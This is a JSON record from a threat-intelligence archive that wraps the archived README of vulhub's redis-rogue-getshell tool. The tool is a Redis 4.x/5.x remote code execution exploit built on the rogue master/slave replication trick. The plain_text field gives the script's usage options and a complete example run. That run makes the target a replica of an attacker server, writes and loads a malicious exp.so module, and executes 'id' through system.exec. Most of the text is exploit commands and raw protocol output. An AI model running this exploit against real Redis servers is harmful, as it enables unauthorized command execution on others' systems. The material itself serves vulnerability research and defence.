{
	"id": "91bc552a-647d-4d20-ba46-647244690ed9",
	"created_at": "2026-04-06T00:11:40.443642Z",
	"updated_at": "2026-04-10T13:12:22.44865Z",
	"deleted_at": null,
	"sha1_hash": "ae7b50d8d9ada4a981ce10299d27922292b09753",
	"title": "GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 40008,
	"plain_text": "GitHub - vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave\r\ngetshell module\r\nBy phith0n\r\nArchived: 2026-04-05 21:40:04 UTC\r\nThen, exp.so is in RedisModulesSDK/exp.so .\r\n➜ python3 redis-master.py -h\r\nusage: redis-master.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]\r\n [-c COMMAND] [-a AUTH] [-v]\r\nRedis 4.x/5.x RCE with RedisModules\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n -r RHOST, --rhost RHOST\r\n target host\r\n -p RPORT, --rport RPORT\r\n target redis port, default 6379\r\n -L LHOST, --lhost LHOST\r\n rogue server ip\r\n -P LPORT, --lport LPORT\r\n rogue server listen port, default 21000\r\n -f FILE, --file FILE RedisModules to load, default exp.so\r\n -c COMMAND, --command COMMAND\r\n Command that you want to execute\r\n -a AUTH, --auth AUTH redis password\r\n➜ python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c \"id\"\r\n\u003e\u003e send data: b'*3\\r\\n$7\\r\\nSLAVEOF\\r\\n$13\\r\\n*.*.*.*\\r\\n$4\\r\\n8888\\r\\n'\r\n\u003e\u003e receive data: b'+OK\\r\\n'\r\n\u003e\u003e send data: b'*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$6\\r\\nexp.so\\r\\n'\r\n\u003e\u003e receive data: b'+OK\\r\\n'\r\n\u003e\u003e receive data: b'PING\\r\\n'\r\n\u003e\u003e receive data: b'REPLCONF listening-port 6379\\r\\n'\r\n\u003e\u003e receive data: b'REPLCONF capa eof capa psync2\\r\\n'\r\n\u003e\u003e receive data: b'PSYNC 7cce9210b3ad3f54043ce1965cda506bd26b0224 1\\r\\n'\r\n\u003e\u003e send data: b'*3\\r\\n$6\\r\\nMODULE\\r\\n$4\\r\\nLOAD\\r\\n$8\\r\\n./exp.so\\r\\n'\r\n\u003e\u003e receive data: b'+OK\\r\\n'\r\nhttps://github.com/vulhub/redis-rogue-getshell\r\nPage 1 of 2\n\n\u003e\u003e send data: b'*3\\r\\n$7\\r\\nSLAVEOF\\r\\n$2\\r\\nNO\\r\\n$3\\r\\nONE\\r\\n'\r\n\u003e\u003e receive data: b'+OK\\r\\n'\r\n\u003e\u003e send data: b'*4\\r\\n$6\\r\\nCONFIG\\r\\n$3\\r\\nSET\\r\\n$10\\r\\ndbfilename\\r\\n$8\\r\\ndump.rdb\\r\\n'\r\n\u003e\u003e receive data: b'+OK\\r\\n'\r\n\u003e\u003e send data: b'*2\\r\\n$11\\r\\nsystem.exec\\r\\n$2\\r\\nid\\r\\n'\r\n\u003e\u003e receive data: b'$49\\r\\n\\x08uid=999(redis) gid=999(redis) groups=999(redis)\\n\\r\\n'\r\nuid=999(redis) gid=999(redis) groups=999(redis)\r\n\u003e\u003e send data: b'*3\\r\\n$6\\r\\nMODULE\\r\\n$6\\r\\nUNLOAD\\r\\n$6\\r\\nsystem\\r\\n'\r\n\u003e\u003e receive data: b'+OK\\r\\n'\r\nSource: https://github.com/vulhub/redis-rogue-getshell\r\nhttps://github.com/vulhub/redis-rogue-getshell\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/vulhub/redis-rogue-getshell"
	],
	"report_names": [
		"redis-rogue-getshell"
	],
	"threat_actors": [],
	"ts_created_at": 1775434300,
	"ts_updated_at": 1775826742,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ae7b50d8d9ada4a981ce10299d27922292b09753.pdf",
		"text": "https://archive.orkl.eu/ae7b50d8d9ada4a981ce10299d27922292b09753.txt",
		"img": "https://archive.orkl.eu/ae7b50d8d9ada4a981ce10299d27922292b09753.jpg"
	}
}